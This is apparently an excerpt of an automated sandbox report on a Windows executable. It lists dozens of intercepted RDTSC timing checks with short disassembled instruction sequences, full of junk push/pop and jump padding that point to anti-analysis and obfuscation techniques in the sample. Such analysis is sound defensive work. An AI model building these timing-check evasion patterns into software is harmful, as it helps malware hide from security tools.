                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B2079F second address: B207B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF3D0F68BB4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F34 second address: B24F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F39 second address: B24F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F3F second address: B24F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007FF3D0D8173Ch 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24F57 second address: B24FA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FF3D0F68BAEh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1CA1h], esi 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D287Fh], edx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007FF3D0F68BA8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 sbb bh, FFFFFFA4h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B24FA9 second address: B24FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B25EEB second address: B25F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D21E1h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FF3D0F68BA8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+122D1D2Dh] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007FF3D0F68BA8h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d mov ebx, dword ptr [ebp+12451F30h] 0x00000053 xchg eax, esi 0x00000054 jmp 00007FF3D0F68BABh 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B28E4F second address: B28E84 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0D81742h 0x00000008 jmp 00007FF3D0D81741h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FF3D0D81755h 0x00000015 push eax 0x00000016 push edx 0x00000017 jno 00007FF3D0D81736h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B2BCCE second address: B2BCD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B30524 second address: B3052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3052A second address: B3052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B34C42 second address: B34C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B34C48 second address: B34C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007FF3D0F68BB3h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jc 00007FF3D0F68BBAh 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B34F20 second address: B34F38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B336 second address: B3B33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B33C second address: B3B348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B348 second address: B3B366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB4h 0x00000007 jns 00007FF3D0F68BA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B366 second address: B3B36E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3B36E second address: B3B380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BAEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A0C3 second address: B3A0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A0CD second address: B3A0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A800 second address: B3A804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A804 second address: B3A82C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF3D0F68BB8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3A82C second address: B3A830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE35 second address: B3FE39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE39 second address: B3FE49 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3D0D81736h 0x00000008 jc 00007FF3D0D81736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE49 second address: B3FE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0F68BB1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE5F second address: B3FE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF3D0D81736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE6B second address: B3FE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FF3D0F68BBEh 0x0000000f jmp 00007FF3D0F68BB2h 0x00000014 jnp 00007FF3D0F68BA6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B3FE92 second address: B3FE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF3D0D81736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B403EB second address: B40411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF3D0F68BB0h 0x0000000a pushad 0x0000000b popad 0x0000000c jng 00007FF3D0F68BA6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40411 second address: B40415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40807 second address: B40811 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3D0F68BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B409A0 second address: B409A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B409A6 second address: B409B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FF3D0F68BA6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40B9A second address: B40BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FF3D0D81736h 0x0000000c je 00007FF3D0D81736h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B40EA6 second address: B40EB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF3D0F68BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0F8E4 second address: AEB420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, cx 0x0000000f lea eax, dword ptr [ebp+1248A63Dh] 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FF3D0D81738h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f add edx, dword ptr [ebp+122D360Bh] 0x00000035 nop 0x00000036 jmp 00007FF3D0D81740h 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007FF3D0D8173Fh 0x00000042 pushad 0x00000043 jmp 00007FF3D0D8173Bh 0x00000048 js 00007FF3D0D81736h 0x0000004e popad 0x0000004f popad 0x00000050 nop 0x00000051 pushad 0x00000052 mov dword ptr [ebp+122D358Ch], edx 0x00000058 mov ax, bx 0x0000005b popad 0x0000005c call dword ptr [ebp+122D25A8h] 0x00000062 pushad 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 pop edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FF3D0D8173Eh 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0FF16 second address: B0FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007FF3D0F68BB2h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0FF38 second address: B0FF59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3D0D81746h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B0FF59 second address: B0FF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10778 second address: B1077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B1077C second address: B10782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10782 second address: B107A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D81744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jng 00007FF3D0D81736h 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B108D6 second address: B108DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B108DC second address: B108E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10B55 second address: B10B9D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3D0F68BA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF3D0F68BAAh 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FF3D0F68BA8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dx, si 0x00000030 lea eax, dword ptr [ebp+1248A681h] 0x00000036 clc 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10B9D second address: B10BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0D8173Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10BAD second address: B10BFD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF3D0F68BA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007FF3D0F68BB2h 0x00000011 js 00007FF3D0F68BACh 0x00000017 jns 00007FF3D0F68BA6h 0x0000001d nop 0x0000001e cld 0x0000001f lea eax, dword ptr [ebp+1248A63Dh] 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007FF3D0F68BA8h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000016h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push ecx 0x00000043 jg 00007FF3D0F68BA6h 0x00000049 pop ecx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10BFD second address: B10C16 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF3D0D81738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FF3D0D81736h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10C16 second address: B10C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B10C1C second address: AEBED1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF3D0D81736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FF3D0D81738h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1F95h], ecx 0x0000002d mov dx, A74Ah 0x00000031 call dword ptr [ebp+122D1B42h] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF3D0D81741h 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: AEBED1 second address: AEBEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007FF3D0F68BA6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B448B1 second address: B448B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44A0C second address: B44A22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF3D0F68BB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44A22 second address: B44A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44A27 second address: B44A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF3D0F68BA6h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF3D0F68BAAh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF3D0F68BABh 0x0000001a js 00007FF3D0F68BA6h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44B64 second address: B44B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44CC6 second address: B44CE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3D0F68BB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44CE7 second address: B44CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B44E42 second address: B44E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A116 second address: B4A11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A735 second address: B4A739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A739 second address: B4A73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A73F second address: B4A781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FF3D0F68BA6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FF3D0F68BB9h 0x00000014 jmp 00007FF3D0F68BB5h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A781 second address: B4A785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4A785 second address: B4A789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4ABE9 second address: B4ABF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4ABF3 second address: B4AC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF3D0F68BAAh 0x0000000a pushad 0x0000000b js 00007FF3D0F68BA6h 0x00000011 jmp 00007FF3D0F68BB2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4AD45 second address: B4AD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4AD4B second address: B4AD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4AD4F second address: B4AD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4B1CD second address: B4B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B4FD95 second address: B4FDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5494C second address: B54963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF3D0F68BB2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B54661 second address: B54673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 je 00007FF3D0D81744h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B54673 second address: B54677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B56F0B second address: B56F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF3D0D81740h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jo 00007FF3D0D81736h 0x00000010 popad 0x00000011 jng 00007FF3D0D8173Ah 0x00000017 push edx 0x00000018 pop edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f jmp 00007FF3D0D8173Eh 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5725A second address: B5727F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF3D0F68BB9h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\onaUtwpiyq.exeRDTSC instruction interceptor: First address: B5727F second address: B57283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
